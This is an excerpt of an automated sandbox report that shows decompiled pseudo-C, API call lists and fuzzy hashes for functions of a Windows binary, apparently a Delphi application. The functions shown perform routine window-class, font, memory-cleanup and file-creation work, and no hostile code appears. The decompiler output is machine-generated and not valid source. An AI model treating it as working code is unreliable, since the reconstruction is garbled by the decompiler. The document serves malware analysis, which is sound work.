                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 83%
                                  			E0043848C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				char _v68;
                                  				struct _WNDCLASSA _v108;
                                  				intOrPtr _v116;
                                  				signed char _v137;
                                  				void* _v144;
                                  				struct _WNDCLASSA _v184;
                                  				char _v188;
                                  				char _v192;
                                  				char _v196;
                                  				int _t52;
                                  				void* _t53;
                                  				intOrPtr _t86;
                                  				intOrPtr* _t95;
                                  				intOrPtr _t106;
                                  				intOrPtr _t110;
                                  				void* _t111;
                                  				intOrPtr _t114;
                                  				void* _t117;
                                  
                                  				_t111 = __edi;
                                  				_push(__ebx);
                                  				_v196 = 0;
                                  				_t95 = __eax;
                                  				_push(_t117);
                                  				_push(0x43864d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t117 + 0xffffff40;
                                  				 *((intOrPtr*)( *__eax + 0x9c))();
                                  				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                  					L7:
                                  					 *((intOrPtr*)(_t95 + 0x17c)) = _v108.lpfnWndProc;
                                  					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                  					asm("sbb eax, eax");
                                  					_t53 = _t52 + 1;
                                  					if(_t53 == 0 || E00431760 != _v184.lpfnWndProc) {
                                  						if(_t53 != 0) {
                                  							UnregisterClassA( &_v68, _v108.hInstance);
                                  						}
                                  						_v108.lpfnWndProc = E00431760;
                                  						_v108.lpszClassName =  &_v68;
                                  						if(RegisterClassA( &_v108) == 0) {
                                  							E0040CAFC();
                                  						}
                                  					}
                                  					 *0x46ecf0 = _t95;
                                  					_t97 =  *_t95; // executed
                                  					 *((intOrPtr*)( *_t95 + 0xa0))();
                                  					if( *(_t95 + 0x188) == 0) {
                                  						E0040CAFC();
                                  					}
                                  					if((GetWindowLongA( *(_t95 + 0x188), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t95 + 0x188), 0xfffffff4) == 0) {
                                  						SetWindowLongA( *(_t95 + 0x188), 0xfffffff4,  *(_t95 + 0x188));
                                  					}
                                  					E00408AE4( *((intOrPtr*)(_t95 + 0x64)));
                                  					 *((intOrPtr*)(_t95 + 0x64)) = 0;
                                  					E0043BD64(_t95);
                                  					E00435DE4(_t95, E0041D650( *((intOrPtr*)(_t95 + 0x68)), _t95, _t97), 0x30, 1);
                                  					_t132 =  *((char*)(_t95 + 0x5c));
                                  					if( *((char*)(_t95 + 0x5c)) != 0) {
                                  						E00403594(_t95, _t132);
                                  					}
                                  					_pop(_t106);
                                  					 *[fs:eax] = _t106;
                                  					_push(0x438654);
                                  					return E0040411C( &_v196);
                                  				} else {
                                  					_t114 =  *((intOrPtr*)(__eax + 4));
                                  					if(_t114 == 0 || ( *(_t114 + 0x1c) & 0x00000002) == 0) {
                                  						L6:
                                  						_v192 =  *((intOrPtr*)(_t95 + 8));
                                  						_v188 = 0xb;
                                  						_t86 =  *0x46fc8c; // 0x41b638
                                  						E00405C70(_t86,  &_v196);
                                  						E0040B86C(_t95, _v196, 1, _t111, _t114, 0,  &_v192);
                                  						E00403B64();
                                  					} else {
                                  						_t110 =  *0x4309d0; // 0x430a1c
                                  						if(E00403524(_t114, _t110) == 0) {
                                  							goto L6;
                                  						}
                                  						_v116 = E0043BA58(_t114);
                                  					}
                                  					goto L7;
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                  • String ID: @
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 91%
                                  			E00454A70(void* __ecx, char __edx) {
                                  				char _v5;
                                  				char _v261;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				intOrPtr _t41;
                                  				intOrPtr _t44;
                                  				intOrPtr _t45;
                                  				struct HINSTANCE__** _t57;
                                  				struct HICON__* _t59;
                                  				intOrPtr _t62;
                                  				struct HINSTANCE__** _t64;
                                  				void* _t71;
                                  				char* _t73;
                                  				CHAR* _t75;
                                  				intOrPtr _t79;
                                  				char* _t80;
                                  				intOrPtr _t86;
                                  				intOrPtr* _t93;
                                  				intOrPtr* _t94;
                                  				intOrPtr _t95;
                                  				void* _t96;
                                  				char _t98;
                                  				void* _t110;
                                  				void* _t111;
                                  
                                  				_t98 = __edx;
                                  				_t96 = __ecx;
                                  				if(__edx != 0) {
                                  					_t111 = _t111 + 0xfffffff0;
                                  					_t41 = E004036BC(_t41, _t110);
                                  				}
                                  				_v5 = _t98;
                                  				_t95 = _t41;
                                  				E00419AE4(_t96, 0);
                                  				_t44 =  *0x46fbc0; // 0x46e3c0
                                  				if( *((short*)(_t44 + 2)) == 0) {
                                  					_t94 =  *0x46fbc0; // 0x46e3c0
                                  					 *((intOrPtr*)(_t94 + 4)) = _t95;
                                  					 *_t94 = 0x456540;
                                  				}
                                  				_t45 =  *0x46fc6c; // 0x46e3c8
                                  				if( *((short*)(_t45 + 2)) == 0) {
                                  					_t93 =  *0x46fc6c; // 0x46e3c8
                                  					 *((intOrPtr*)(_t93 + 4)) = _t95;
                                  					 *_t93 = E0045674C;
                                  				}
                                  				 *((char*)(_t95 + 0x34)) = 0;
                                  				 *((intOrPtr*)(_t95 + 0x90)) = E00403368(1);
                                  				 *((intOrPtr*)(_t95 + 0x98)) = E00403368(1);
                                  				 *((intOrPtr*)(_t95 + 0xb0)) = E00403368(1);
                                  				 *((intOrPtr*)(_t95 + 0x60)) = 0;
                                  				 *((intOrPtr*)(_t95 + 0x84)) = 0;
                                  				 *((intOrPtr*)(_t95 + 0x5c)) = 0xff000018;
                                  				 *((intOrPtr*)(_t95 + 0x78)) = 0x1f4;
                                  				 *((char*)(_t95 + 0x7c)) = 1;
                                  				 *((intOrPtr*)(_t95 + 0x80)) = 0;
                                  				 *((intOrPtr*)(_t95 + 0x74)) = 0x9c4;
                                  				 *((char*)(_t95 + 0x88)) = 0;
                                  				 *((char*)(_t95 + 0xa5)) = 1;
                                  				 *((char*)(_t95 + 0xbc)) = 1;
                                  				_t109 = E00424398(1);
                                  				 *((intOrPtr*)(_t95 + 0xa0)) = _t56;
                                  				_t57 =  *0x46fae4; // 0x47002c
                                  				_t59 = LoadIconA( *_t57, "MAINICON"); // executed
                                  				E0042476C(_t109, _t59);
                                  				_t21 = _t95 + 0xa0; // 0x736d
                                  				_t62 =  *_t21;
                                  				 *((intOrPtr*)(_t62 + 0x14)) = _t95;
                                  				 *((intOrPtr*)(_t62 + 0x10)) = 0x456e68;
                                  				_t64 =  *0x46fae4; // 0x47002c
                                  				GetModuleFileNameA( *_t64,  &_v261, 0x100);
                                  				OemToCharA( &_v261,  &_v261);
                                  				_t71 = E0040C5E8( &_v261, 0x5c);
                                  				if(_t71 != 0) {
                                  					_t28 = _t71 + 1; // 0x1
                                  					E00408914( &_v261, _t28);
                                  				}
                                  				_t73 = E0040C61C( &_v261, 0x2e);
                                  				if(_t73 != 0) {
                                  					 *_t73 = 0;
                                  				}
                                  				_t75 = CharNextA( &_v261); // executed
                                  				CharLowerA(_t75);
                                  				_t32 = _t95 + 0x8c; // 0x44c408
                                  				E0040438C(_t32, 0x100,  &_v261);
                                  				_t79 = E0041AC4C(0x4560a0, _t95); // executed
                                  				 *((intOrPtr*)(_t95 + 0xc8)) = _t79;
                                  				_t80 =  *0x46f9c4; // 0x470034
                                  				if( *_t80 == 0) {
                                  					E00454DBC(_t95, _t95, 0x100); // executed
                                  				}
                                  				 *((char*)(_t95 + 0x59)) = 1;
                                  				 *((char*)(_t95 + 0x5a)) = 1;
                                  				 *((char*)(_t95 + 0x5b)) = 1;
                                  				 *((char*)(_t95 + 0xa6)) = 1;
                                  				 *((intOrPtr*)(_t95 + 0xa8)) = 0;
                                  				E00457044(_t95, 0x100);
                                  				E00457B94(_t95);
                                  				_t86 = _t95;
                                  				if(_v5 != 0) {
                                  					E00403714(_t86);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t95;
                                  			}

                                  APIs
                                  • LoadIconA.USER32(00400000,MAINICON), ref: 00454B67
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454B99
                                  • OemToCharA.USER32(?,?), ref: 00454BAC
                                  • CharNextA.USER32(?,00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454BEB
                                  • CharLowerA.USER32(00000000,?,00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454BF1
                                    • Part of subcall function 00454DBC: GetClassInfoA.USER32 ref: 00454E1B
                                    • Part of subcall function 00454DBC: RegisterClassA.USER32 ref: 00454E33
                                    • Part of subcall function 00454DBC: SetWindowLongA.USER32 ref: 00454ECF
                                    • Part of subcall function 00454DBC: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00454EF1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                  • String ID: MAINICON
                                  • API String ID: 2763768735-2283262055
                                  • Opcode ID: a971928b379ed62e67f92584156a638d0b6216b3f26efbe11004fc7510dec769
                                  • Instruction ID: a5d0ee8b058183cc28b8085fb3a1a620d47b4c75ef1d8a2d30d8b7fa40885917
                                  • Opcode Fuzzy Hash: a971928b379ed62e67f92584156a638d0b6216b3f26efbe11004fc7510dec769
                                  • Instruction Fuzzy Hash: 895173706042449FDB40EF29D8C5B863BE4AB55309F4480FAEC48DF397D7B99988CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 86%
                                  			E00454054(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                  				signed char _v5;
                                  				struct tagLOGFONTA _v65;
                                  				struct tagLOGFONTA _v185;
                                  				struct tagLOGFONTA _v245;
                                  				void _v405;
                                  				void* _t23;
                                  				int _t27;
                                  				void* _t30;
                                  				intOrPtr _t38;
                                  				struct HFONT__* _t41;
                                  				struct HFONT__* _t45;
                                  				struct HFONT__* _t49;
                                  				intOrPtr _t52;
                                  				intOrPtr _t54;
                                  				void* _t57;
                                  				intOrPtr _t66;
                                  				void* _t72;
                                  				void* _t74;
                                  				void* _t75;
                                  				intOrPtr _t76;
                                  
                                  				_t72 = __edi;
                                  				_t74 = _t75;
                                  				_t76 = _t75 + 0xfffffe6c;
                                  				_t57 = __eax;
                                  				_v5 = 0;
                                  				if( *0x470b40 != 0) {
                                  					_t54 =  *0x470b40; // 0x0
                                  					_v5 =  *(_t54 + 0x88) & 0x000000ff;
                                  				}
                                  				_push(_t74);
                                  				_push(0x45419b);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t76;
                                  				if( *0x470b40 != 0) {
                                  					_t52 =  *0x470b40; // 0x0
                                  					E00456B3C(_t52, 0);
                                  				}
                                  				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                  					_t23 = GetStockObject(0xd);
                                  					_t7 = _t57 + 0x84; // 0x38004010
                                  					E0041D838( *_t7, _t23, _t72);
                                  				} else {
                                  					_t49 = CreateFontIndirectA( &_v65); // executed
                                  					_t6 = _t57 + 0x84; // 0x38004010
                                  					E0041D838( *_t6, _t49, _t72);
                                  				}
                                  				_v405 = 0x154;
                                  				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                  				if(_t27 == 0) {
                                  					_t14 = _t57 + 0x80; // 0x94000000
                                  					E0041D91C( *_t14, 8);
                                  					_t30 = GetStockObject(0xd);
                                  					_t15 = _t57 + 0x88; // 0x90000000
                                  					E0041D838( *_t15, _t30, _t72);
                                  				} else {
                                  					_t41 = CreateFontIndirectA( &_v185);
                                  					_t11 = _t57 + 0x80; // 0x94000000
                                  					E0041D838( *_t11, _t41, _t72);
                                  					_t45 = CreateFontIndirectA( &_v245);
                                  					_t13 = _t57 + 0x88; // 0x90000000
                                  					E0041D838( *_t13, _t45, _t72);
                                  				}
                                  				_t16 = _t57 + 0x80; // 0x94000000
                                  				E0041D63C( *_t16, 0xff000017);
                                  				_t17 = _t57 + 0x88; // 0x90000000
                                  				E0041D63C( *_t17, 0xff000007);
                                  				_pop(_t66);
                                  				 *[fs:eax] = _t66;
                                  				_push(0x4541a2);
                                  				if( *0x470b40 != 0) {
                                  					_t38 =  *0x470b40; // 0x0
                                  					return E00456B3C(_t38, _v5 & 0x000000ff);
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004540A9
                                  • CreateFontIndirectA.GDI32(?), ref: 004540B6
                                  • GetStockObject.GDI32(0000000D), ref: 004540CC
                                    • Part of subcall function 0041D91C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041D929
                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004540F5
                                  • CreateFontIndirectA.GDI32(?), ref: 00454105
                                  • CreateFontIndirectA.GDI32(?), ref: 0045411E
                                  • GetStockObject.GDI32(0000000D), ref: 00454144
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                  • String ID:
                                  • API String ID: 2891467149-0
                                  • Opcode ID: 097e7dd5a140271ab4e0f1fe3780ff60882b91e72990156bdc5ee2b6fd0039de
                                  • Instruction ID: 1c5afefc91e9e3d657ab10b91448fc6a73b8a75925d093f732c062defb83fc42
                                  • Opcode Fuzzy Hash: 097e7dd5a140271ab4e0f1fe3780ff60882b91e72990156bdc5ee2b6fd0039de
                                  • Instruction Fuzzy Hash: C231C030714200ABD710FBA9CC46B9A73E4AB44308F514076BE0CDB297DB7899C9CB29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 566 401ae4-401aef 567 401bc2-401bc4 566->567 568 401af5-401b0a 566->568 569 401b16-401b35 LocalFree 568->569 570 401b0c-401b11 RtlEnterCriticalSection 568->570 571 401b49-401b4f 569->571 570->569 572 401b51-401b77 call 4013d8 * 3 571->572 573 401b37-401b47 VirtualFree 571->573 580 401b90-401ba4 572->580 581 401b79-401b8e LocalFree 572->581 573->571 583 401bb0-401bba RtlDeleteCriticalSection 580->583 584 401ba6-401bab RtlLeaveCriticalSection 580->584 581->580 581->581 584->583
                                  C-Code - Quality: 72%
                                  			E00401AE4() {
                                  				void* _t2;
                                  				void* _t4;
                                  				intOrPtr* _t20;
                                  				void* _t21;
                                  				intOrPtr _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t28;
                                  
                                  				_t26 = _t28;
                                  				if( *0x4705c0 == 0) {
                                  					return _t2;
                                  				} else {
                                  					_push(_t26);
                                  					_push(E00401BBB);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t28;
                                  					if( *0x470049 != 0) {
                                  						_push(0x4705c8);
                                  						L00401370();
                                  					}
                                  					 *0x4705c0 = 0;
                                  					_t4 =  *0x470620; // 0x0
                                  					LocalFree(_t4);
                                  					 *0x470620 = 0;
                                  					_t20 =  *0x4705e8; // 0x4705e8
                                  					while(_t20 != 0x4705e8) {
                                  						_t1 = _t20 + 8; // 0x0
                                  						VirtualFree( *_t1, 0, 0x8000); // executed
                                  						_t20 =  *_t20;
                                  					}
                                  					E004013D8(0x4705e8);
                                  					E004013D8(0x4705f8);
                                  					E004013D8(0x470624);
                                  					_t21 =  *0x4705e0; // 0x0
                                  					while(_t21 != 0) {
                                  						 *0x4705e0 =  *_t21;
                                  						LocalFree(_t21);
                                  						_t21 =  *0x4705e0; // 0x0
                                  					}
                                  					_pop(_t24);
                                  					 *[fs:eax] = _t24;
                                  					_push(0x401bc2);
                                  					if( *0x470049 != 0) {
                                  						_push(0x4705c8);
                                  						L00401378();
                                  					}
                                  					_push(0x4705c8);
                                  					L00401380();
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(Function_000705C8,00000000,00401BBB), ref: 00401B11
                                  • LocalFree.KERNEL32(00000000,00000000,00401BBB), ref: 00401B23
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401BBB), ref: 00401B42
                                  • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401BBB), ref: 00401B81
                                  • RtlLeaveCriticalSection.KERNEL32(Function_000705C8,00401BC2,00000000,00000000,00401BBB), ref: 00401BAB
                                  • RtlDeleteCriticalSection.KERNEL32(Function_000705C8,00401BC2,00000000,00000000,00401BBB), ref: 00401BB5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                  • String ID:
                                  • API String ID: 3782394904-0
                                  • Opcode ID: a90460f84af10d68d4834b73fcccb8d4a75ad201c2ce3c469a13e6ed06d5fbec
                                  • Instruction ID: 5da7ee02dd3990a8179c8bff4f367911b9b70c4f51f5b977864fdeba06431de5
                                  • Opcode Fuzzy Hash: a90460f84af10d68d4834b73fcccb8d4a75ad201c2ce3c469a13e6ed06d5fbec
                                  • Instruction Fuzzy Hash: 1D118470202740AAE750EB75AC91F2A36E8A746744F444077F50CEA6F2D77C68848B1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 83%
                                  			E0041603C(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
                                  				char _v5;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				void* _t28;
                                  				void* _t48;
                                  				void* _t62;
                                  				void* _t63;
                                  				intOrPtr _t67;
                                  				intOrPtr _t69;
                                  				char _t70;
                                  				intOrPtr _t73;
                                  				void* _t85;
                                  				void* _t87;
                                  				void* _t88;
                                  				intOrPtr _t89;
                                  
                                  				_t70 = __edx;
                                  				_t63 = __ecx;
                                  				_t87 = _t88;
                                  				_t89 = _t88 + 0xffffffdc;
                                  				_v36 = 0;
                                  				_v40 = 0;
                                  				_v28 = 0;
                                  				_v32 = 0;
                                  				if(__edx != 0) {
                                  					_t89 = _t89 + 0xfffffff0;
                                  					_t28 = E004036BC(_t28, _t87);
                                  				}
                                  				_t85 = _t63;
                                  				_v5 = _t70;
                                  				_t62 = _t28;
                                  				_t83 = _a8;
                                  				_push(_t87);
                                  				_push(0x41617a);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t89;
                                  				if(_a8 != 0xffff) {
                                  					E00415F34(E00408424(_t85, _t83 & 0x0000ffff), 0);
                                  					if( *((intOrPtr*)(_t62 + 4)) < 0) {
                                  						E00408828(_t85,  &_v36);
                                  						_v24 = _v36;
                                  						_v20 = 0xb;
                                  						E0040B01C(GetLastError(),  &_v40);
                                  						_v16 = _v40;
                                  						_v12 = 0xb;
                                  						_t67 =  *0x46f9a8; // 0x410940
                                  						E0040B928(_t62, _t67, 1, _t83, _t85, 1,  &_v24);
                                  						E00403B64();
                                  					}
                                  				} else {
                                  					_t48 = CreateFileA(E004045DC(_t85), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
                                  					E00415F34(_t48, 0);
                                  					if( *((intOrPtr*)(_t62 + 4)) < 0) {
                                  						E00408828(_t85,  &_v28);
                                  						_v24 = _v28;
                                  						_v20 = 0xb;
                                  						E0040B01C(GetLastError(),  &_v32);
                                  						_v16 = _v32;
                                  						_v12 = 0xb;
                                  						_t69 =  *0x46fdc0; // 0x410938
                                  						E0040B928(_t62, _t69, 1, _t83, _t85, 1,  &_v24);
                                  						E00403B64();
                                  					}
                                  				}
                                  				_pop(_t73);
                                  				 *[fs:eax] = _t73;
                                  				_push(E00416181);
                                  				return E00404140( &_v40, 4);
                                  			}

                                  APIs
                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,0041617A,?,?,00412020,00000001), ref: 00416098
                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,0041617A,?,?,00412020,00000001), ref: 004160C6
                                    • Part of subcall function 00408424: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00412020,00416106,00000000,0041617A,?,?,00412020), ref: 00408472
                                    • Part of subcall function 00408828: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,00412020,00416121,00000000,0041617A,?,?,00412020,00000001), ref: 00408847
                                  • GetLastError.KERNEL32(00000000,0041617A,?,?,00412020,00000001), ref: 0041612B
                                    • Part of subcall function 0040B01C: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000), ref: 0040B03B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                  • String ID: 8A$@A
                                  • API String ID: 503785936-3417271196
                                  • Opcode ID: 6baa3fec48cac93b196265584cd8af881f428efd9606a6422453efb081aa99d3
                                  • Instruction ID: 2d1d410ca380f408bcedd66532c35719c719d195cb2580b4103ebeede3b8d25c
                                  • Opcode Fuzzy Hash: 6baa3fec48cac93b196265584cd8af881f428efd9606a6422453efb081aa99d3
                                  • Instruction Fuzzy Hash: D7314470A006049FDB10EFA989427DEBBF5AB49304F51807AE504BB3C2D77959458BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E0045385C(char __edx, void* __edi) {
                                  				char _v5;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __ebp;
                                  				intOrPtr _t25;
                                  				intOrPtr* _t28;
                                  				intOrPtr* _t29;
                                  				intOrPtr _t42;
                                  				intOrPtr* _t45;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				intOrPtr _t58;
                                  				intOrPtr _t59;
                                  				intOrPtr _t62;
                                  				void* _t63;
                                  				char _t64;
                                  				void* _t74;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  
                                  				_t74 = __edi;
                                  				_t64 = __edx;
                                  				if(__edx != 0) {
                                  					_t77 = _t77 + 0xfffffff0;
                                  					_t25 = E004036BC(_t25, _t76);
                                  				}
                                  				_v5 = _t64;
                                  				_t62 = _t25;
                                  				E00419AE4(_t63, 0);
                                  				_t28 =  *0x46fa74; // 0x46e3b0
                                  				 *((intOrPtr*)(_t28 + 4)) = _t62;
                                  				 *_t28 = 0x453c00;
                                  				_t29 =  *0x46fa80; // 0x46e3b8
                                  				 *((intOrPtr*)(_t29 + 4)) = _t62;
                                  				 *_t29 = 0x453c0c;
                                  				E00453C18(_t62);
                                  				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
                                  				 *((intOrPtr*)(_t62 + 0x4c)) = E00403368(1);
                                  				 *((intOrPtr*)(_t62 + 0x50)) = E00403368(1);
                                  				 *((intOrPtr*)(_t62 + 0x54)) = E00403368(1);
                                  				 *((intOrPtr*)(_t62 + 0x58)) = E00403368(1);
                                  				_t42 = E00403368(1);
                                  				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
                                  				L004066E4();
                                  				_t75 = _t42;
                                  				L0040641C();
                                  				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
                                  				L00406944();
                                  				_t11 = _t62 + 0x58; // 0x44c2786e
                                  				_t45 =  *0x46fbd4; // 0x470920
                                  				 *((intOrPtr*)( *_t45))(0, 0, E0044F920,  *_t11, 0, _t75, _t75, 0x5a, 0);
                                  				 *((intOrPtr*)(_t62 + 0x84)) = E0041D468(1);
                                  				 *((intOrPtr*)(_t62 + 0x88)) = E0041D468(1);
                                  				 *((intOrPtr*)(_t62 + 0x80)) = E0041D468(1);
                                  				E00454054(_t62, _t62, _t63, _t74);
                                  				_t15 = _t62 + 0x84; // 0x38004010
                                  				_t56 =  *_t15;
                                  				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t56 + 8)) = 0x453f18;
                                  				_t18 = _t62 + 0x88; // 0x90000000
                                  				_t57 =  *_t18;
                                  				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t57 + 8)) = 0x453f18;
                                  				_t21 = _t62 + 0x80; // 0x94000000
                                  				_t58 =  *_t21;
                                  				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t58 + 8)) = 0x453f18;
                                  				_t59 = _t62;
                                  				if(_v5 != 0) {
                                  					E00403714(_t59);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t62;
                                  			}

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 004538A1
                                  • 72E7AC50.USER32(00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 004538F6
                                  • 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00453900
                                  • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000), ref: 0045390B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380KeyboardLayout
                                  • String ID: G
                                  • API String ID: 648844651-4269207688
                                  • Opcode ID: 0e9601a85dce75a326e045158b6e68fc395887a2c7c23a29b069aeec360f8a19
                                  • Instruction ID: bed6efe629424c4c62093f41002e0a171e8a7d575386f60ba0c89031240d5bee
                                  • Opcode Fuzzy Hash: 0e9601a85dce75a326e045158b6e68fc395887a2c7c23a29b069aeec360f8a19
                                  • Instruction Fuzzy Hash: FF310BB06002409FD740EF2AD8C1B887BE4BB05749F44817AED08DF3A3DB799908CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
